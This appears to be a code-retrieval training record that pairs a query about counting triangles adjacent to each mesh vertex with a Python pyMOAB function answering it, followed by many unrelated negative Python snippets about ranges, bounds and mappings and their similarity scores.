Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def _autobounds(self):\n bounds = {}\n\n def check(prop, compare, extreme, val):\n opp = min if compare is max else max\n bounds.setdefault(prop, val)\n bounds[prop] = opp(compare(bounds[prop], val), extreme)\n\n def bound_check(lat_lon):\n lat, lon = lat_lon\n check('max_lat', max, 90, lat)\n check('min_lat', min, -90, lat)\n check('max_lon', max, 180, lon)\n check('min_lon', min, -180, lon)\n\n lat_lons = [lat_lon for feature in self._features.values() for\n lat_lon in feature.lat_lons]\n if not lat_lons:\n lat_lons.append(self._default_lat_lon)\n for lat_lon in lat_lons:\n bound_check(lat_lon)\n\n return bounds", "def create_dict(list, old_min, old_max, new_min, new_max):\n d = {}\n for row in list:\n tds = row.find_all(\"td\")\n letter = tds[0].string\n freq = tds[1].string[:-1]\n freq = float(freq.replace(',', '.'))\n d[letter] = map_to_range(freq, old_min, old_max, new_min, new_max)\n\n return d", "def _get_range(self):\n return tuple((0, m, 1) for m in self.level_shapes[0])", "def scan_range(self, obj):\n detect_minmax = []\n for item in self._category:\n cat = item.replace(' ', '')\n has_minmax = False\n for k, v in obj.items():\n has_minmax = has_minmax or isinstance(v.get(cat), dict)\n in_k, in_v = list(v.items())[-1]\n while not isinstance(in_v, str):\n has_minmax = has_minmax or isinstance(v.get(cat), dict)\n in_k, in_v = list(in_v.items())[-1]\n \n if has_minmax:\n detect_minmax.append('Min ' + item)\n detect_minmax.append('Max ' + item)\n else:\n detect_minmax.append(item)\n \n self._category_aux = detect_minmax\n for c in self._category_aux:\n self._data[c] = []", "def kwargs (self):\n return dict (bins=self.bins, range=self.range)", "def kwargs (self):\n return dict (bins=self.bins, range=self.range)", "def get_gnid_range_map(node_tids):\n ntypes_gid_range = {}\n offset = 0\n for k, v in node_tids.items():\n ntypes_gid_range[k] = [offset + int(v[0][0]), offset + int(v[-1][1])]\n offset += int(v[-1][1])\n\n return ntypes_gid_range", "def create_band_maps(self):\n band_maps = []\n source_band_index = 1\n target_band_index = self.starting_target_band\n for band in self.image['bands']:\n band_maps.append({\n 'source': source_band_index,\n 'target': target_band_index\n })\n source_band_index += 1\n target_band_index += 1\n return band_maps", "def get_bounds():\n return [0.00], [1.00]", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n # type: () -> Dict[Text: Union[Dict, List[Dict]]]\n return {\n \"numero_prendas\": [\n self.from_entity(entity=\"number\"),\n\n ]\n }", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n # type: () -> Dict[Text: Union[Dict, List[Dict]]]\n return {\n \"numero_prendas\": [\n self.from_entity(entity=\"number\"),\n\n ]\n }", "def findRanges(data_grouped):\n ranges = []\n for i in data_grouped.columns:\n theRange = (data_grouped[i].min(), data_grouped[i].max())\n ranges.append(theRange)\n return ranges", "def get_valid_values_map(self, condition=True):\n tpninfos = self.locate.get_all_tpninfos(self.instrument, self.filekind, \"ld_tpn\")\n required_keys = self.get_required_parkeys()\n valid_values = {}\n for info in tpninfos:\n if info.is_complex_constraint:\n 
continue\n if info.name in required_keys:\n values = info.values\n if len(values) == 1 and \":\" in values[0]:\n limits = values[0].split(\":\")\n try:\n limits = [int(float(x)) for x in limits]\n except Exception:\n pass\n # sys.exc_clear()\n else:\n values = list(range(limits[0], limits[1]+1))\n if condition:\n values = tuple([utils.condition_value(val) for val in values])\n valid_values[info.name] = values\n return valid_values", "def test_get_range(self):\n pass", "def compute_bounds(self, space):\n bounds = np.zeros((len(space), 2))\n\n for idx, param in enumerate(space):\n\n if TYPE[param[\"type\"]] is TYPE.FLOAT or \\\n TYPE[param[\"type\"]] is TYPE.INTEGER:\n bounds[idx] = (param[\"min\"], param[\"max\"])\n\n elif TYPE[param[\"type\"]] is TYPE.DISCRETE or \\\n TYPE[param[\"type\"]] is TYPE.DISCRETE:\n bounds[idx] = (0, len(param['values']))\n\n return bounds", "def _get_area_incmfd_attr(max_np, max_hd, max_bins):\n\n att = []\n att.append({'name': 'src_id', 'type': 'String', 'len': 10})\n att.append({'name': 'src_name', 'type': 'String', 'len': 30})\n att.append({'name': 'tect_reg', 'type': 'String', 'len': 30})\n att.append({'name': 'upp_seismo', 'type': 'Real'})\n att.append({'name': 'low_seismo', 'type': 'Real'})\n att.append({'name': 'mag_scal_r', 'type': 'String', 'len': 15})\n att.append({'name': 'rup_asp_ra', 'type': 'Real'})\n att.append({'name': 'mfd_type', 'type': 'String', 'len': 20})\n\n att.append({'name': 'min_mag', 'type': 'Real'})\n att.append({'name': 'bin_width', 'type': 'Real'})\n att.append({'name': 'num_bins', 'type': 'Integer'})\n for i in range(1, max_bins+1):\n lab = 'or_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n\n att.append({'name': 'num_npd', 'type': 'Integer'})\n for i in range(1, max_np+1):\n lab = 'weight_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'strike_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'rake_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'dip_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n\n att.append({'name': 'num_hdd', 'type': 'Integer'})\n for i in range(1, max_hd+1):\n lab = 'hdd_d_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'hdd_w_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n\n return att", "def get_idranges(names, counts, num_chunks=None):\n gnid_start = 0\n gnid_end = gnid_start\n tid_dict = {}\n gid_dict = {}\n\n for idx, typename in enumerate(names):\n gnid_end += counts[typename]\n tid_dict[typename] = [[0, counts[typename]]]\n gid_dict[typename] = np.array([gnid_start, gnid_end]).reshape([1, 2])\n gnid_start = gnid_end\n\n return tid_dict, gid_dict", "def get_ranges(self, tchain, kw):\n (lo, hi) = (\"min\", \"max\")\n ran = None\n for t in tchain:\n rstmt = t.search_one(kw)\n if rstmt is None: continue\n ran = [ i.split(\"..\") for i in rstmt.arg.split(\"|\") ]\n if ran[0][0] != 'min': lo = ran[0][0]\n if ran[-1][-1] != 'max': hi = ran[-1][-1]\n if ran is None: return None\n if len(ran) == 1:\n return [(lo, hi)]\n else:\n return [(lo, ran[0][-1])] + ran[1:-1] + [(ran[-1][0], hi)]", "def attributes(self):\n attrs_ = super(NumericAttributeSchema, self).attributes()\n attrs_.append(\"range\")\n return attrs_", "def _calc_range(self) -> np.ndarray:\n if self._is_ct25k():\n range_resolution = 30\n n_gates = 256\n else:\n n_gates = int(self.metadata[\"number_of_gates\"])\n range_resolution = int(self.metadata[\"range_resolution\"])\n return np.arange(n_gates) * range_resolution + range_resolution / 2", "def getAFeRange(brand):\n 
return afe_range[brand]", "def get_etype_2_minmax_funcEnum(entitytype_arr):\n etype_2_minmax_funcEnum = {}\n s = pd.Series(entitytype_arr)\n for name, group in s.groupby(s):\n etype_2_minmax_funcEnum[name] = (min(group.index), max(group.index))\n return etype_2_minmax_funcEnum", "def _parse_memory_map(cls, node: OMNode) -> List[OMMemoryRegion]:\n mmap = []\n for memregion in node.get('memoryRegions', []):\n for addrset in memregion.get('addressSets', []):\n name = memregion['name'].lower()\n mem = OMMemoryRegion(name,\n HexInt(addrset['base']),\n HexInt(addrset['mask']+1),\n memregion.get('description', ''))\n mmap.append(mem)\n return mmap", "def generate_var_ranges(self):\n\n var_ranges = {}\n for var in self.variables:\n min_to_max = list(range(int(var['min']), int(var['max']) + 1))\n if (var['zero_ok'] == False and 0 in min_to_max):\n min_to_max.remove(0)\n\n var_ranges[var['variable']] = min_to_max\n\n return var_ranges", "def byrange(self, start, stop):\n\t\treturn ElementsByRange(self.AEM_want, self, (start, stop))", "def prep_reference(self):\n\n # if basin\n if self.config.metric == 'basin':\n df = pd.read_csv(self.config.gcam_basin_names_file, usecols=['basin_id'])\n m = sorted(df['basin_id'].tolist())\n\n # if AEZ, use 1 through 18 - this will not change\n elif self.config.metric == 'aez':\n m = list(range(1, 19, 1))\n\n # read in region ids\n rdf = pd.read_csv(self.config.gcam_region_names_file, usecols=['gcam_region_id'])\n r = sorted(rdf['gcam_region_id'].tolist())\n\n return m, r", "def get_price_range_map(data_map):\n res_map = defaultdict(lambda: deepcopy(static_constants.UNIT_PRICE_DEFAULT))\n for key, list_of_price in data_map.items():\n list_of_price.sort()\n lower_price = np.percentile(list_of_price, 40)\n higher_price = np.percentile(list_of_price, 70)\n median_price = np.percentile(list_of_price, 50)\n res_map[key] = {'lower_price': lower_price, 'median_price': median_price, 'higher_price': higher_price}\n return res_map", "def range_to_m(self, data):\n return data * self._total_range + self._min_range_m", "def base_mappings():\n return {\n 'from_1': {\n 'to_1': {\n 'mol_1': ({}, {}, []),\n 'mol_2': ({}, {}, []),\n },\n },\n }", "def range_parameter_to_dict(parameter: RangeParameter) -> Dict[str, Any]:\n return {\n \"__type\": parameter.__class__.__name__,\n \"name\": parameter.name,\n \"parameter_type\": parameter.parameter_type,\n \"lower\": parameter.lower,\n \"upper\": parameter.upper,\n \"log_scale\": parameter.log_scale,\n \"logit_scale\": parameter.logit_scale,\n \"digits\": parameter.digits,\n \"is_fidelity\": parameter.is_fidelity,\n \"target_value\": parameter.target_value,\n }", "def setMassRanges(self, massRanges):\n\t\tif self.hasMassRange:\n\t\t\traise RuntimeError(\"Cannot setMassRange(...) 
twice, since the COMA has to be cut\")\n\t\tself.massRanges = self.toIntegerSectorMap(massRanges)\n#\t\tzeroIndices = []\n#\t#\tCMwrite(\"setMassRanges(\"+str(massRanges)+')')\n\t#\tfor s in range(self.nSect):\n\t#\t\tfor i,b in enumerate(range(self.borders[s],self.borders[s+1])):\n\t#\t\t\tif s in self.massRanges:\n\t#\t\t\t\tbinCenterMass = self.binCenters[b]\n\t#\t\t\t\tif binCenterMass < self.massRanges[s][0] or binCenterMass >= self.massRanges[s][1]:\n\t#\t\t\t\t\tzeroIndices.append(b)\n\t#\tfor i in range(len(self.coma)):\n\t#\t\tfor zi in zeroIndices:\n\t#\t\t\tself.coma[i,2*zi ] = 0.\n\t#\t\t\tself.coma[i,2*zi+1] = 0.\n\t#\t\t\tself.coma[2*zi ,i] = 0.\n\t#\t\t\tself.coma[2*zi+1,i] = 0.\n\n\t\tself.hasMassRange = True\n\t\tself.makeComaInv()\n\t\tself.specialCOMAs = {}", "def _bi_range(start, end):\n if start == end:\n return (start,)\n\n elif end < start:\n return reversed(range(end, start + 1))\n\n else:\n return range(start, end + 1)", "def summarize_ranges(self, ranges):\n if len(ranges) == 0: return []\n min_ = 'min'\n max_ = 'max'\n for r in ranges:\n if r[0][0] == \"min\":\n r[0][0] = min_\n else:\n min_ = r[0][0]\n if r[-1][1] == \"max\":\n r[-1][1] = max_\n else:\n max_ = r[-1][1]\n return ranges[-1]", "def process_range(id_range):\n try:\n store = {}\n for i, id in enumerate(id_range):\n store[id] = loadProt(id)\n print(f'\\r>>Loading Set: {\"{:.2f}\".format(i+1 / len(id_range) * 100)}%', end='')\n return store\n except:\n traceback.print_exc()\n raise", "def get_bounds():\n bounds = [\n (0.1, 0.5), # Omega_m\n (0.05, 0.15) # beta\n ]\n return np.array(bounds)", "def get_bases():\n\treturn ((MV.ONE,),) + MV.blades[1:]\n\t# return ((MV.ONE,),) + MV.bases[1:]", "def _get_limits(robot, limit_type):\n target_ctrl_path = get_target_ctrl_path(robot)\n\n limits = {}\n\n # Check if the rig has attributes for the input limit type\n # If not, add the corresponding limit attributes\n # This is mostly used for backwards-compatibility\n\n if not pm.attributeQuery('axis{}Limits'.format(limit_type),\n n=target_ctrl_path, ex=True):\n add_limits_to_robot(robot, limit_type)\n\n # HARD CODED - Number of robot axes; should include external axes\n num_axes = 6\n\n # Create a list of robot's limits\n for i in range(num_axes):\n axis_number = i + 1 # Axis numbers are 1-indexed\n axis_name = 'Axis {}'.format(axis_number)\n limits[axis_name] = {'Min Limit': None, 'Max Limit': None}\n\n try:\n limit = pm.getAttr(target_ctrl_path + '.axis{}' \\\n '{}Limit'.format(axis_number, limit_type))\n except AttributeError:\n limit = None\n\n if limit:\n limits[axis_name] = {'Min Limit': -limit,\n 'Max Limit': limit}\n \n # TO-DO: Add external axes\n return limits", "def planets_in_range(self):\n\n query_string = \"SELECT * from planets_in_range;\"\n\n # Perform query\n self.conn_cur.execute(query_string)\n results = self.conn_cur.fetchall()\n\n # Build dictionary\n ranges = {}\n for row in results:\n ranges[row[0]] = row[1]\n\n return ranges", "def dict_time(self, workspace_unique_id=None, subset_unique_id=None, request=None):\n workspace_object = self._get_workspace_object(unique_id=workspace_unique_id) \n subset_object = workspace_object.get_subset_object(subset_unique_id) \n if not subset_object:\n self._logger.warning('Could not find subset object {}. 
Subset is probably not loaded.'.format(subset_unique_id))\n return {}\n\n data_filter_object = subset_object.get_data_filter_object('step_1')\n if request:\n data_filter_object.set_filter(filter_type='include_list', \n filter_name='MYEAR', \n data=request['year_range'])\n# data_filter_object.set_filter(filter_type='include_list', \n# filter_name='MONTH', \n# data=request['month_list'])\n \n else:\n year_list = sorted(map(int, data_filter_object.get_include_list_filter('MYEAR')))\n# month_list = sorted(map(int, data_filter_object.get_include_list_filter('MONTH')))\n \n return {\"year_range\": [year_list[0], year_list[-1]]}#, \"month_list\": month_list}", "def get_range(self) -> tuple[int, int]:\n return self.range_from, self.range_to", "def get(self, _min_value, _max_value):\n \n result = dict()\n for k in self.objects.keys():\n if self.objects[k][0] >= _min_value[0] and\\\n self.objects[k][1] >= _min_value[1] and\\\n self.objects[k][0] < _max_value[0] and \\\n self.objects[k][1] < _max_value[1]:\n result[k]=self.objects[k]\n return result", "def get_ranges(self) -> typing.List[typing.Tuple[float, float]]:\n return self.ranges[:]", "def m_to_range(self, data):\n return (data - self._min_range_m) / self._total_range", "def f1Q_simultaneous_RBs(self) -> Dict[int, Optional[float]]:\n return {qs.id: qs.f1Q_simultaneous_RB for qs in self.qubits_specs}", "def get_cytobands(bt, cyto_bed):\n\n chrom = bt[0].chrom\n bands = sorted(list(set([x[-2] for x in bt.intersect(cyto_bed, wb=True)])))\n if len(bands) > 1:\n bandrange = '{}{}-{}'.format(chrom, bands[0], bands[-1])\n else:\n bandrange = chrom + bands[0]\n\n return bandrange", "def limits(array, names):\n\n args = ['%s(%s)' % (f, n)\n for n in names\n for f in ['min', 'max']]\n result = array.afl.aggregate(array, *args).toarray()\n return dict((n, (int(result['%s_min' % n][0]), int(result['%s_max' % n][0])))\n for n in names)", "def parse_range_set(range_string):\n # TODO: add UTs for this.\n\n # Parse a range string as specified by format_range_set() below\n # Be generous dealing with duplicate entries in the specification.\n if not range_string:\n return []\n ranges = [\n (lambda sublist: range(sublist[0], sublist[-1] + 1))\n (list(map(int, subrange.split('-')))) for subrange in range_string.split(',')]\n return list(set([y for x in ranges for y in x]))", "def EM_gain_range(self):\n mini, maxi = ct.c_int(), ct.c_int()\n self.lib.GetEMGainRange(ct.pointer(mini), ct.pointer(maxi))\n\n return (mini.value, maxi.value)", "def get_my_mutations(quality_cutoff, coverage_cutoff):\n\n # my_mutations = {}\n # with open('/home/perry/Projects/loh/working/murim.exome.aa_chg.vars') as f:\n # for line in f:\n # my_mutations[line.strip()] = True\n # return my_mutations\n\n bed_file = 'data/nimblegen/2.1M_Human_Exome_Annotation/2.1M_Human_Exome.bed'\n bed_chr2st2end, bed_chr2posLs = bed_tools.load_bed(bed_file, \n 'NimbleGen Tiled Regions')\n # NimbleGen Tiled Regions\n # Target Regions\n\n use_data_dir = '/home/perry/Projects/loh/data/all_non_ref_hg18/'\n all_somatic = {}\n all_inherited = {}\n cancer_qualities = mutations.get_consensus_qualities(use_data_dir + 'yusanT.ann')\n normal_qualities = mutations.get_consensus_qualities(use_data_dir + 'yusanN.ann')\n for exome in global_settings.exome_types:\n data_file = use_data_dir + exome\n inherited, somatic, murim = mutations.get_mutations(data_file, normal_qualities,\n cancer_qualities, quality_cutoff,\n False, coverage_cutoff)\n # only use the bed_tools NimbleGen\n # restriction for hg18 data\n for s in 
somatic['yusan']: \n chr, pos = s.split(':')\n if bed_tools.find_location_in_bed(chr, int(pos), \n bed_chr2posLs,\n bed_chr2st2end):\n all_somatic[s] = True\n for i in inherited['yusan']: \n chr, pos = s.split(':')\n if bed_tools.find_location_in_bed(chr, int(pos), \n bed_chr2posLs,\n bed_chr2st2end):\n all_inherited[i] = True\n return (set(all_somatic.keys()) & set(get_murim_covered(quality_cutoff)), set(all_inherited.keys()) & set(get_murim_covered(quality_cutoff)))", "def createBins():\n theBins = []\n startFreq = 60\n for a in range(32):\n endFreq = int(startFreq*1.12+12)\n theRange = (startFreq, endFreq)\n startFreq = endFreq\n theBins.append(theRange)\n return(theBins)", "def backbone(self):\n\n bb = self.get(lambda x, name=self._bbname,type=self._bbtype:\n x.name in name and x.element in type)\n if bb is None: return AtomSet( [] )\n else: return bb", "def _build_memorymap(self):\n\t\tmemorymap = {}\n\t\ttotalsize = 0\n\t\tbaserva = self.liststream64.DirectoryData.BaseRva\n\t\tmmdscrptr64 = self.liststream64.DirectoryData.MINIDUMP_MEMORY_DESCRIPTOR64\n\t\tnumberofmemoryranges = self.liststream64.DirectoryData.NumberOfMemoryRanges\n\t\tfor i in range(numberofmemoryranges):\n\t\t\tmemorymap[mmdscrptr64[i].StartOfMemoryRange] = ((baserva + totalsize),mmdscrptr64[i].DataSize)\n\t\t\ttotalsize += mmdscrptr64[i].DataSize\n\t\treturn memorymap", "def range(self):\n lows, highs = [], []\n for graph in self._graphs.values():\n low, high = graph.range()\n lows.append(low)\n highs.append(high)\n return (min(lows), max(highs))", "def range_8(configuration):\n range_dict_all = {\n # updated aLIGO design sensitivity range from 197.5 to 181.5 Mpc on 9 Apr 2018 to reflect T1800044-v4\n \"HL\" : {'H1' : 181.5, 'L1' : 181.5},\n \"HLV\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3 },\n \"HLVK\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, 'K1' : 160.0},\n \"HLVKI\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, 'K1' : 160.0, 'I1' : 181.5},\n \"GW170817\" : {'H1': 107/2.26 *1.26 , 'L1': 218/2.26, 'V1': 58/2.26}, # 1.26 is the improvement factor for H1's range due to data processing.\n \"GW170817_without_Virgo\" : {'H1': 107/2.26 *1.26 , 'L1': 218/2.26},\n \"GW170814\" : {'H1': 53, 'L1': 98, 'V1': 26}, # 1.26 is the improvement factor for H1's range due to data processing.\n \"design\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3 },\n \"early\" : {'H1' : 60., 'L1': 60.},\n \"half_ligo\" : {'H1' : 99, 'L1' : 99, 'V1': 128.3 },\n \"half_virgo\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 64 },\n \"nosrm\" : {'H1' : 159, 'L1' : 159, 'V1': 109 },\n \"india\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 },\n \"kagra\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 , \\\n \"K1\" : 160.0},\n \"bala\" : {'H1' : 181.5, 'H2' : 181.5, 'L1' : 181.5, 'V1': 128.3, \\\n \"I1\" : 181.5 , \"K1\" : 160.0},\n \"sa\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 , \\\n \"K1\" : 160.0, \"S1\":181.5},\n \"sa2\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 , \\\n \"K1\" : 160.0, \"S1\":181.5},\n \"steve\" : {'H1' : 160.0, 'L1' : 160.0, 'V1': 160.0, \"I1\" : 160.0 },\n \"s6vsr2\" : {'H1' : 20., 'L1' : 20., 'V1': 8. 
}\n }\n return(range_dict_all[configuration])", "def value_ranges(self, attributes):\n ranges = []\n for attribute in attributes:\n if not attribute.is_continuous():\n raise inv.InvalidDataError('Cannot discretise non continuous attribute ' + attribute.name)\n values = self.values_grouped_by_attribute(attributes)\n for value in values: #each entry in values is the range of values for a particular attribute\n value.sort()\n ranges.append(r.Range(value[0], value[-1], True))\n return ranges", "def _get_params_ranges(task: str,) -> Dict[str, Any]:\n params_file = os.path.join(\n os.path.dirname(__file__), \"params\", \"xgboost.yml\"\n )\n params = utils.read_yaml(params_file)\n\n if \"regression\" in task.lower():\n params.update({\"objective\": \"reg:squarederror\"})\n return params\n if \"binary\" in task.lower():\n params.update({\"objective\": \"binary:logistic\"})\n return params\n raise ValueError(f\"{task} is not a supported task.\")", "def get_recordrange(self):\r\n if self.version >= 10.1:\r\n querystr = \"\"\"?where=&outFields=*&returnGeometry=false&returnIdsOnly=false&returnCountOnly=false&orderByFields=&groupByFieldsForStatistics=&outStatistics=[{%0D%0A++++\"statisticType\"%3A+\"count\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidcount\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"min\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmin\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"max\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmax\"%0D%0A++}]&returnZ=false&returnM=false&returnDistinctValues=false&f=pjson\"\"\"\r\n req = requests.get(self.endpointurl + querystr)\r\n self.recordinfo = req.json()[\"features\"][0][\"attributes\"]\r\n\r\n elif self.version < 10.1:\r\n querystr = \"\"\"?text=&geometry=&geometryType=esriGeometryPoint&inSR=&spatialRel=esriSpatialRelIntersects&relationParam=&objectIds=&where=objectid+>+-1&time=&returnCountOnly=true&returnIdsOnly=false&returnGeometry=false&maxAllowableOffset=&outSR=&outFields=&f=pjson\"\"\"\r\n req = requests.get(self.endpontquerystr + qs)\r\n self.recordinfo = {\"oidmin\": 0, \"oidmax\": req.json()[\"count\"]}\r\n\r\n [\r\n self.iterlist.append([x, x + 999])\r\n for x in range(\r\n self.recordinfo[\"oidmin\"]\r\n if self.recordinfo[\"oidmin\"] != self.recordinfo[\"oidmax\"]\r\n else 1 - self.recordinfo[\"oidmin\"],\r\n self.recordinfo[\"oidmax\"],\r\n 1000,\r\n )\r\n ]", "def get_dict_from_range(self, start=None, end=None):\n df = self.from_range(self.data, self.factor, start, end, self.lowpass)\n new_source_data = df.to_dict(orient=\"list\")\n new_source_data[\"index\"] = df.index\n for k in list(new_source_data):\n if isinstance(k, tuple):\n new_source_data[\"_\".join(k)] = new_source_data.pop(k)\n\n return new_source_data", "def calcBRange(c,n=10):\n \n bMin = -abs(c)/2.0 \n bMax = abs(c)/2.0 \n return np.linspace(bMin,bMax,n)", "def get_z_ranges(self):\n\n summary = self.get_rasters_summary()\n\n # Convert to dict in format:\n # { 'stat' : { 'z': (min, max), ... } ... 
}\n\n ranges = summary.groupby(['stat', 'z'], as_index=False)\n ranges = ranges.agg({'min': 'min', 'max': 'max'})\n ranges['vals'] = ranges.apply(\n lambda row: {\n row['z']: (row['min'], row['max'])\n }, axis=1)\n ranges = ranges.groupby('stat')['vals'].apply(\n lambda group: group.values)\n ranges = ranges.apply(\n lambda group: {\n int(k): v for d in group for k,\n v in d.items()})\n\n return ranges.to_dict()", "def get_hyperparameter_bounds():\n minf = float(\"-inf\")\n inf = float(\"inf\")\n params = dict(mu=(minf,inf), nu=(0.0 ,inf), r=(0.0, inf), s=(0.0, inf))\n return params", "def getAgeRange(brand):\n from numpy import arange, append\n \n # search dictionary for tuple containing age limits (min, max, delta)\n #age_limits = age_range[brand]\n \n # hard code age range properties (temporary)\n if brand in ['Lyon', 'Lyon10', 'Lyon19']:\n ages = 10.0**arange(6.0, 10.1, 0.1)\n elif brand in ['DMESTAR', 'DSEP14', 'DSEP08', 'DSEP']:\n ages = arange(1.0e6, 20.0e6, 1.0e5) \n ages = append(ages, arange(2.0e7, 1.001e8, 5.0e6))\n elif brand in ['Pisa']:\n ages = arange(1.0e6, 20.0e6, 1.0e6)\n ages = append(ages, arange(2.0e7, 1.001e8, 5.0e6))\n elif brand in ['Yale', 'Yale13', 'BAton']:\n ages = arange(1.0e6, 2.0e7, 2.0e5)\n ages = append(ages, arange(2.0e7, 1.0e8, 5.0e6))\n else:\n ages = 0.0\n \n return ages", "def getFeHRange(brand):\n return feh_range[brand]", "def area(minRA, maxRA, minDec, maxDec):\n\n return dict(zip(['minRA', 'maxRA', 'minDec', 'maxDec'], [minRA, maxRA, minDec, maxDec]))", "def get_config(self): # To support serialization\n return {\"min value\": self.minval, \"max value\": self.maxval}", "def SETOBS(start, end):\n session = Session(engine)\n # Query all passengers\n\n SETBOS = session.query(Measurement.date, func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= end).group_by(Measurement.date).all() \n\n # Convert list of tuples into normal list\n all_SETOBS = list(np.ravel(SETBOS))\n\n return jsonify(all_SETOBS)", "def parse_ranges(ranges, expand=True):\n pairs = ranges.split(' ')\n content = {}\n for key, value in [pair.split('=') for pair in pairs if '=' in pair]:\n content[key] = parse_range_once(value, expand)\n return content" ]
[ "0.59818125", "0.5639009", "0.5639009", "0.5624772", "0.5565236", "0.5513016", "0.5494546", "0.5442198", "0.54400784", "0.5380527", "0.5366019", "0.5358748", "0.5318177", "0.5313223", "0.52917475", "0.5266361", "0.5262664", "0.5223182", "0.5186198", "0.517666", "0.5118012", "0.51148266", "0.51148266", "0.51148266", "0.51148266", "0.5109687", "0.5102881", "0.50763667", "0.50756514", "0.5072759", "0.5072759", "0.5072759", "0.5072759", "0.5045249", "0.5043399", "0.5023693", "0.50052595", "0.4988633", "0.4988633", "0.498708", "0.4984921", "0.4982452", "0.4981665", "0.4981665", "0.49786368", "0.4964445", "0.4953378", "0.4930351", "0.49109262", "0.49091402", "0.49071664", "0.49064443", "0.490628", "0.49061376", "0.49007428", "0.4898019", "0.48885", "0.48766676", "0.48562163", "0.484985", "0.4848712", "0.48439667", "0.4841173", "0.484104", "0.48381698", "0.4833407", "0.48189518", "0.4813048", "0.48087043", "0.48070675", "0.4805858", "0.47974396", "0.4796646", "0.4794392", "0.47937232", "0.4792211", "0.4779179", "0.47755167", "0.4770627", "0.4764661", "0.4760232", "0.47424707", "0.473834", "0.4730006", "0.47275013", "0.47259507", "0.47217327", "0.47199056", "0.47149846", "0.47097206", "0.47091854", "0.47029316", "0.46998838", "0.46971732", "0.46919367", "0.46891788", "0.46891215", "0.4682287", "0.46817464", "0.46815357" ]
0.6958238
0
This function will return data about the number of triangles on each vertex in a file.
def get_triangles_per_vertex(my_core, native_ranges):
    t_p_v_data = []
    tri_dimension = 2
    for vertex in native_ranges[types.MBVERTEX]:
        t_p_v_data.append(my_core.get_adjacencies(vertex, tri_dimension).size())
    return np.array(t_p_v_data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def count_triangles(self, file):\n self.nibble(80)\n return struct.unpack(\"@i\", self.nibble(4))[0]", "def get_num_vertices(triangles):\n return numpy.amax(numpy.reshape(triangles, -1)) + 1", "def count_cells(fpath):\n cells = []\n for i in range(40):\n fname = f\"{fpath}/Mesh2d_{i}.vtu\"\n if not os.path.exists(fname):\n print(f\"File {fname} does not exist.\")\n break\n mesh = meshio.read(fname)\n for cell_block in mesh.cells:\n if cell_block.type in (\"triangle\"):\n num_cells = len(cell_block)\n print(f\"{i:2d}: {num_cells:6d} elements, {len(mesh.points):6d} vertices\")\n cells.append(num_cells)\n continue\n return cells", "def test_triangle_count_05(self):\n body = {\"direction\": \"IN\", \"degree\": -1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_in': 13, 'vertices_in': 9, 'triangles': 2}\n else:\n assert 0", "def test_triangle_count_08(self):\n body = {\"direction\": \"IN\", \"degree\": 1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_in': 13, 'vertices_in': 9, 'triangles': 0}\n else:\n assert 0", "def count_aux(self, infile):\n n_aux = 0\n n_tokens = 0\n dgs_in = self._file_handler.file_to_dg_list(infile)\n for dg in dgs_in:\n n_tokens += len(dg)\n transform = VGtransformer(dg, dep_style=self._dep_style)\n transform.transform()\n n_aux += transform.tot_aux\n return n_aux, n_tokens, len(dgs_in)", "def test_triangle_count_06(self):\n body = {\"direction\": \"OUT\", \"degree\": -1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_out': 13, 'vertices_out': 7, 'triangles': 2}\n else:\n assert 0", "def test_triangle_count_04(self):\n body = {\"direction\": \"OUT\"}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_out': 13, 'vertices_out': 7, 'triangles': 2}\n else:\n assert 0", "def num_data_lines(filepath):\n\tif not file_exists(filepath):\n\t\treturn -1\n\tcount = 0\n\twith open(filepath, 'r') as f:\n\t\twhile read_floats(f):\n\t\t\tcount += 1\n\tf.close()\n\treturn count", 